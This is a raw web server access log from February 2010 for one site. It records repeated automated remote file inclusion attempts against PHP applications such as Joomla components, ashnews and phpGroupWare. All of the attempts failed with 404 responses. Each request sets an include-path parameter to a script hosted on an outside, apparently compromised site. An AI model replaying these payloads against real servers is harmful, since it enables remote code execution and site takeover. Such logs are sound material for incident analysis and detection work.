220.73.144.196 - - [20/Feb/2010:08:51:11 -0800] "GET /logs/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:51:21 -0800] "GET /bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:51:21 -0800] "GET /logs/access_100207.log/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:51:21 -0800] "GET /logs/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:51:37 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:51:37 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:51:38 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [20/Feb/2010:08:51:50 -0800] "GET /logs/access_100205.log/bbs/delete.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:51:52 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:52:04 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:52:04 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:52:04 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:08 -0800] "GET /logs/access_100115.log/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:15 -0800] "GET /logs/access_100206.log//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:15 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:18 -0800] "GET /admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:18 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:18 -0800] "GET /logs/access_100206.log//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:32 -0800] "GET /admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:32 -0800] "GET /logs//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:52:32 -0800] "GET /logs/access_100206.log//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:52:41 -0800] "GET /logs/access_100207.log%20%20//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:52:41 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:52:41 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:52:54 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:52:54 -0800] "GET /logs/access_100207.log%20%20//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:52:54 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:53:00 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:53:00 -0800] "GET /logs/access_100206.log///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:53:00 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:08:53:06 -0800] "GET /logs/access_100204.log/convert/mvcw.php?vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:08:53:06 -0800] "GET /convert/mvcw.php?vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [20/Feb/2010:08:53:06 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:53:52 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:53:52 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:53:52 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:54:20 -0800] "GET /logs/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:54:20 -0800] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:54:20 -0800] "GET /logs/access_100115.log%20%20/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:54:26 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:54:35 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:54:35 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:54:39 -0800] "GET /logs/access_100207.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:54:47 -0800] "GET /logs/access_100207.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:54:47 -0800] "GET /components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:54:47 -0800] "GET /logs//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:15 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:15 -0800] "GET /logs/access_100123.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:15 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:16 -0800] "GET /logs/access_100115.log/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:17 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:17 -0800] "GET /logs/access_100203.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:21 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:21 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:55:22 -0800] "GET /logs/access_100123.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:55:32 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:55:32 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:55:32 -0800] "GET /logs/access_100119.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:35 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:35 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:55:35 -0800] "GET /logs/access_100203.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:56:04 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:56:05 -0800] "GET /logs/access_100114.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:56:05 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:56:18 -0800] "GET /logs/access_100114.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.45.90.196 - - [20/Feb/2010:08:56:20 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:56:57 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:56:57 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:56:57 -0800] "GET /logs/access_100201.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:56:57 -0800] "GET /logs/access_100207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:57:13 -0800] "GET /logs/access_100114.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:57:15 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:57:18 -0800] "GET /logs/access_100115.log/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:18 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:18 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:18 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:18 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:19 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:19 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:19 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:19 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:57:21 -0800] "GET /config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:57:21 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:26 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:26 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:26 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [20/Feb/2010:08:57:26 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:57:27 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:57:28 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [20/Feb/2010:08:57:34 -0800] "GET /logs/access_100114.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:35 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:35 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:35 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [20/Feb/2010:08:57:37 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:57:55 -0800] "GET /ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:57:55 -0800] "GET /logs/access_100123.log%20%20/ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:57:55 -0800] "GET /logs/ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:08:58:08 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:08:58:08 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [20/Feb/2010:08:58:22 -0800] "GET /logs/access_100202.log///bbs/delete_all.php?board_skin_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:32 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:32 -0800] "GET /logs/access_100204.log/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:32 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [20/Feb/2010:08:58:34 -0800] "GET /logs/access_100123.log//components/com_comprofiler/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:08:58:39 -0800] "GET /logs/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:08:58:40 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:51 -0800] "GET /logs/access_100208.log/convert/mvcw.php?step=1&vwar_root=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:56 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:56 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:56 -0800] "GET /logs/access_100201.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [20/Feb/2010:08:58:56 -0800] "GET /logs/access_100207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [20/Feb/2010:08:59:03 -0800] "GET /logs/access_100114.log%20%20/ashnews.php?pathtoashnews=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:59:42 -0800] "GET /config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:08:59:43 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
